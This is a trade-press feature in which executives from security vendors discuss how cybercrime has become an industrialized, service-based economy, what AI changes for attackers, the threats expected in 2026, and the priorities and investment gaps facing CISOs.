Cybercriminals have built structured criminal groups with an organizational model similar to that of a legitimate business. “Cybercrime has become industrialized, a return on investment (ROI)-oriented economy, focused on speed and monetization,” according to Martin Zugec, Bitdefender’s director of technical solutions.
Zugec explains that this modus operandi of cybercriminal groups is characterized by a high degree of specialization, which includes initial access brokers or ransomware-as-a-service (RaaS) affiliates. “Today, sophistication is not measured by the complexity of the tools, but by the simplicity and speed of the execution chain,” says Zugec.
This change requires a shift from a threat detection-based approach to one focused on prevention. “Detection has become a commodity that attackers routinely evade so organizations must go beyond reactive monitoring,” says Zugec. “The goal should be to break attackers’ playbooks and make internal environments inherently hostile to them through proactive hardening that eliminates the operational space they need to succeed.”
The business of cybercrime isn’t new
“Cybercrime has been operating as an industry for years, meaning it has become professionalized and attacks have been modularized,” says Guillermo Fernández, director of sales engineering for southern Europe at WatchGuard Technologies.
In practice, this means that it is no longer necessary for a single attacker to know how to do everything, but rather that the crime is divided into specialties (some steal and resell credentials, others develop and maintain ransomware, others provide infrastructure and negotiation, etc.) and all of this is packaged into models as a service, as we see in the case of ransomware-as-a-service. “This lowers the barrier to entry and reduces the cost of attacking, which explains why we are seeing more and more campaigns and higher volumes,” says Fernández.
In addition, AI helps accelerate the scale and sophistication of some phases or tasks, such as reconnaissance, personalization of deceptions, or automation of parts of the process.
How big is it? “The global economic impact of cybercrime is close to $10 trillion. If it were a country’s economy, it would be one of the three world powers, behind only the United States and China. For organizations, this means that it is not enough to react to incidents. Defense must take the same business approach: anticipation, risk management, operational continuity, and resilience by design,” says Juan Francisco Moreda, director of /fsafe, Fibratel’s cybersecurity unit.
As a result, cybercrime has become a fully industrialized criminal economy, according to Moreda. “Today we are talking about highly specialized organizations, with as-a-service models (ransomware, phishing, malware), their own supply chains, and a clear focus on profitability and scalability.”
That is why Martín Trullás, director of Advanced Solutions at Ingram Micro Spain, believes that cybercrime operates with well-organized structures, different professional profiles in its ranks, short- and long-term objectives, and financing that allows it to improve its model with new technology and new strategies to achieve the success of its operations.
“Cybercriminals are no longer isolated individuals with computer skills and a desire for quick and easy money, but actors who, in some cases, appear to have state support to use them as part of a struggle that transcends the economic and digital spheres and often enters the realm of geopolitics.”
However, in his opinion, there are still simple gangs of cybercriminals whose goal is money or data, which they then turn into profit by reselling it to third parties. “What’s happening is that they now have better access to more powerful technologies with which they can streamline their operations, attacking with greater speed and in a massive and scalable way. This changes the approach to cyber defense: we can no longer be reactive, equipping companies and users with different levels of ‘shields’ and sitting back to wait for the attack to repel it, but rather we must take action,” Trullás adds.
That is why Trullás believes that the best cyber defense strategy must combine passive security with active monitoring of the entire digital ecosystem of the company or user, to reduce the time taken to detect and respond to an incident to limit damage.
Evolution of the security strategy
Alessandro Armenia, global head of cybersecurity at ReeVo, believes that three key aspects are emerging in the current landscape: “First, attacks are no longer isolated events, but coordinated, in some cases automated, operations that often originate within the organizations themselves, for example, due to human error or exposed credentials. Second, the time factor plays a decisive role: even today, many companies realize they are under attack when it is already too late. Finally, the attack surface is growing faster than companies’ ability to manage it.”
As a result, the defense strategy must also evolve. “It can no longer be based solely on compliance or one-off interventions, but must be continuous, structured, and resilience-oriented,” Armenia explains.
And that’s despite the fact that companies have the necessary tools to manage their attack surface. “Where they often fail is in the governance model: cybersecurity continues to be approached as a series of isolated compliance exercises over time, and it is precisely in the gaps between one exercise and another that the attacker manages to infiltrate and carry out the attack.”
Because the reality is: an IT outage becomes a serious problem when the company does not have a plan. “A prepared organization, with defined and tested procedures, is able to recover in a matter of minutes; those that are not prepared run the risk of losing hours, days, and, in some cases, their reputation,” Armenia concludes.
As a result, cybercriminals now have organizational models similar to those of companies. “You can see that there are different types of profiles in these groups, depending on the size of the organization, from the more technical ones, who work in a coordinated team, to the more commercial ones, who are in charge of dealing with victims when negotiation is necessary,” warns David Sancho, senior threat researcher at Trend Micro.
Furthermore, Sancho explains that they often also have people who are responsible for selling the product created to partners or customers, which in the business world would correspond to the channel or the marketing. This is already a reality.”
Established groups
Abraham Vázquez, pre-sales engineer at Infinigate Iberia, gives examples such as the DragonForce or Anubis groups, which “operate as genuine criminal service providers, offering infrastructure, management panels, technical support, and different extortion models. It is a highly fragmented ecosystem, but at the same time very resilient, capable of adapting and regenerating quickly.”
This leads him to conclude that the main implication for defense is that it is no longer enough to react to the final attack. “It is necessary to disrupt the entire criminal chain, reinforcing identity as a central pillar of security, prioritizing proper credential hygiene, greater telemetry capabilities, and rapid containment mechanisms that limit the impact from the early stages of the attack,” Vázquez adds.
And the outlook is not promising. “According to the World Economic Forum, the cybercrime economy will continue to grow, reaching $23 trillion by 2027. Industrialized ransomware, automated fraud networks, and converging crime models will drive this growth,” says Gorka Sainz, director of systems engineering at Fortinet Iberia.
The role of AI and automation
“AI is the new fuel for the criminal economy. It allows them to scale attacks as if they were marketingcampaigns, “argues Salvador Sánchez Taboada of CyberProofUST.
A glance at the business landscape is enough to see that artificial intelligence has become a real multiplier of scale for the criminal economy, enabling the generation of highly granular and personalized phishing campaigns on demand, as Abraham Vázquez argues. “This includes everything from deepfakes of executives to increasingly evasive malware, supported by tools such as WormGPT or FraudGPT. Thanks to these capabilities, attacks are more credible, difficult to detect, and easy to replicate.”
As an example, CrowdStrike’s Threat Hunting report 2025 reveals how cybercriminals are targeting the tools used to build AI agents. “Their goal is to gain access, steal credentials, and deploy malware, highlighting how autonomous systems and non-human identities are a key part of today’s enterprise attack surface and a growing enabler of large-scale automated attacks,” says Álvaro del Hoy, technology strategist at CrowdStrike.
Add to this, that criminal groups are integrating generative AI directly into ransomware, “using it to automatically create variants and optimize processes such as executing attacks, negotiating with victims, and extortion strategies,” says Abraham Vázquez
On the other hand, automation is key to streamlining access, lifecycle, and permission processes, but it also recognizes that attackers seek to exploit identities and privileges at scale, says Albert Barnwell, director of sales for Iberia at CyberArk.
“This means that offensive automation allows cybercriminals to move faster and exploit compromised identities without friction. Thus, organizations must respond with defensive automation, especially in the management of identity lifecycle, permissions, and rights,” Barnwell adds.
We are already reaching a point where the entire attack cycle can be automated through orchestration: agents who investigate a company and its employees (including social media footprints, interests, and potential weaknesses), others who generate highly targeted and convincing phishing, and chains that lead to malware infection, according to Guillermo Fernández. “From there, the malware itself can learn about the environment and find out what tools and defenses are in place within the company in order to adjust its technique and maximize its impact,” he says.
And this doesn’t stop at initial access, as even extortion can be automated. It is even possible for the ransom negotiation to be carried out by a bot that adapts its discourse and conditions based on the responses to squeeze out the payment.
Martin Zugec says AI is not a magic bullet for attackers. While it has significantly helped to scale social engineering attacks, removing language barriers and improving the quality of decoys, these tools are not particularly useful for the heavier work of an intrusion.
“We see very little evidence that AI is successfully replacing human expertise in vulnerability research or exploit development. The RaaS ecosystem relies on trust and human ingenuity. The main drivers of successful attacks continue to be hackers and affiliates who operate manually and navigate complex networks. The question is not what AI is capable of doing in theory, but whether it makes sense from an economic standpoint. For a professional threat actor, the cost of managing, adjusting, and securing an AI framework often outweighs the efficiency gains over traditional and proven hacking techniques,” Zugec elaborates.
Main threats and attack vectors in 2026
The current geopolitical context does not invite optimism either. Carlos Castañeda-Marroquin, head of pre-sales and business development at Serval Networks, believes that “in 2026, we will see an increase in hybrid threats driven by geopolitical tensions, where cyberspace is used as an extension of economic and strategic conflicts between states and related groups. This will translate into espionage, digital sabotage, and disinformation campaigns targeting both critical infrastructure and key industrial sectors.”
The theft of credentials and tokens, the use of infostealers, or the abuse of valid access, combined with a greater emphasis on malware-free techniques and hands-on-keyboard activity, have been gaining ground in recent months, according to David López García, director of operations at Factum. All of this leads, in many cases, to system intrusions that evolve into ransomware and extortion, with increasingly shorter, more automated attack cycles that are clearly aimed at operational and economic impact.
López García also warns that in 2026, the extended perimeter and relationships with third parties will gain prominence. “Faced with a larger surface area of exposure, cybercriminals find more opportunities to exploit configurations, identities, and external dependencies, with a greater likelihood of finding a breach in the supply chain.”
Consequently, the challenge for organizations is no longer just to protect their systems but to effectively govern an interconnected digital ecosystem, where trust becomes one of the most critical assets and having solid solutions or allies is an operational necessity.
In terms of attack vectors, Guillermo Fernández believes that vulnerabilities and weak configurations in remote access and VPNs will continue to be prominent, in addition to the compromise of SaaS tools (accounts, permissions, integrations). “And on the human front, social engineering will become even more effective with advanced phishing and image and voice deepfakes, increasing the risk of fraud. Likewise, we will see more impersonation and initial access. WatchGuard also anticipates that 2026 may be the year of the first agent-based AI-orchestrated end-to-end breach, bringing offensive automation to ‘machine speed,’” Fernández says.
Are companies investing enough in cyber defenses?
A ‘cybersecurity poverty line’ that affects not only budgets, but the availability of strategic leadership and capabilities to define roadmaps, understand key metrics, and evolve toward maturity goals, is an existing issue according to Rafe Pilling, director of threat intelligence at Sophos X-Ops. “The strong performance of the cybersecurity market does not eliminate the fundamental gap between real risk and management perception. Sophos predicts that many of the most serious disruptions in 2026 will not be the result of sophisticated techniques, but of basic security hygiene failures that are entirely preventable,” he explains.
Pilling argues that the reality is that having a CISO in a company is now a luxury, highlighting the magnitude of the specialized talent deficit. Companies must understand cyber resilience as a strategic priority at the management level and not just as a technological challenge. This gap between available capabilities and real threats explains why most organizations lack the visibility, controls, and expertise necessary to defend themselves effectively against a highly industrialized criminal ecosystem.
What is clear is that as cyber threats increase, organizations are facing the reality that security attacks are not just a possibility, but a certainty. “At the same time, it is estimated that there is a global shortage of more than 4.7 million qualified professionals, which means that critical security positions are not being filled when they are most needed,” says Gorka Sainz.
“There remains a clear gap in effectiveness,” says Abraham Vázquez. In his opinion, “many organizations still lack real visibility into their risk exposure, boards of directors maintain a limited level of confidence in defensive capabilities, and third parties continue to play a significant role, being involved in approximately 30% of security breaches.”
On the other hand, there is still a gap between the complexity of the environment (hybrid, SaaS, multi-cloud) and the maturity of identity controls. Likewise, many organizations still do not consistently apply intelligent privilege controls, while the need to automate the identity and permission lifecycle indicates that current investment is not always sufficient or well targeted.
And not only does this gap exist, but there is also a cultural gap, as Salvador Sánchez Taboada points out. “Many management teams see cybersecurity as an expense, not as a lifesaver,” he acknowledges. In Spain and Latin America, we are working to change that view, relying on integration through AI between existing risk plans and new threats: investing in resilience is like investing in good foundations before building a house. Every change of cycle reminds us that the invisible—like foundations—supports everything we value.”
Increased spending “is often diverted toward AI hype and supposedly miraculous solutions driven by marketing, rather than addressing real risks,” argues Martin Zugec. That’s why he believes attackers have evolved toward simpler, harder-to-detect techniques, such as LOTL or ClickFix, which weaponize legitimate system tools and user interactions to bypass security layers.
“This disconnect between where defenders invest and how attackers evolve is a dangerous trend, clearly visible when comparing the findings of real forensic investigations with the narratives popularized in professional networks. This disconnect is reckless,” he warns.
CISO priorities
In this context, CISOs are forced to continually rethink their defense strategies. “Beyond having solid internal teams and adequate prevention tools, it is increasingly necessary to complement these capabilities with trusted technology partners and insurers capable of managing cyber risk in a more holistic way,” says Vincent Nguyen, director of cybersecurity at Stoïk.
As attackers professionalize and scale their operations, Nguyen believes that effective defense requires a proactive and integrated approach that combines advanced cybersecurity solutions, risk transfer through cyber insurance, and operational support when an incident occurs. “Strategic partners with a cross-functional view of risk can accompany organizations before, during, and after an attack, strengthening resilience without replacing internal security leadership,” he adds.
In any case, Martín Trullas acknowledges that there is no single winning strategy for the CISO, but rather a set of different strategies focused on different areas. “On the one hand, identity security must be strengthened, as it can become a gateway for more serious attacks. And this identity security should no longer be understood only as ‘human identity’ but must also focus on the identity of connected devices, which can also become vectors for attack,” he explains.
“At the same time, it is necessary to implement organizational and mindset changes within the company: proper governance, cybersecurity training for all employees, promotion of best practices to reduce risks, and a culture of proactivity to reduce detection and response time in the event of an attack. The entire company must be involved in these processes, because leaving cybersecurity as the sole responsibility of the CISO or the department on duty is a mistake that can be very costly.”
Of course, this requires CISOs to have the right resources. “And they don’t have it easy, with often unrealistic expectations that cause them to experience signs of burnout,” says Fernando Anaya, general manager of Proofpoint for Spain and Portugal.
Anaya cites this data: “In Spain, 51% of security managers say they still lack the necessary means to meet their objectives. Similarly, it is crucial to strengthen incident response capabilities, especially considering that a third of Spanish organizations admit to being unprepared. A much more proactive approach is also needed to foster a culture of cybersecurity that goes beyond simply trusting users and includes concrete and effective actions to reduce data loss. The pressure on CISOs is increasing as these resource constraints are combined with such a rapidly changing threat environment, making it imperative that they work to align themselves strategically with their organizations’ boards of directors, seeking a shared vision that ensures the necessary support and appropriate decision-making.
At the same time, Abraham Vázquez believes that it will be essential to advance zero–trust models and perimeter hardening, eliminating legacy VPNs and accelerating patching processes in edge environments, as well as ensuring proven resilience through immutable backups and isolated recovery environments. “The automation of detection and response, supported by SOAR and AI platforms, will enable the cycle between detection and containment to be closed efficiently, effectively reducing response times. Added to this is the need for more mature third-party and supply chain management, based on continuous assessment of cybersecurity posture and minimal but relevant telemetry.”
“It will be key to conduct internal crisis management exercises that consider realistic scenarios, such as ransomware attacks without payment, fraud using deepfakes of management, or outages of critical suppliers.”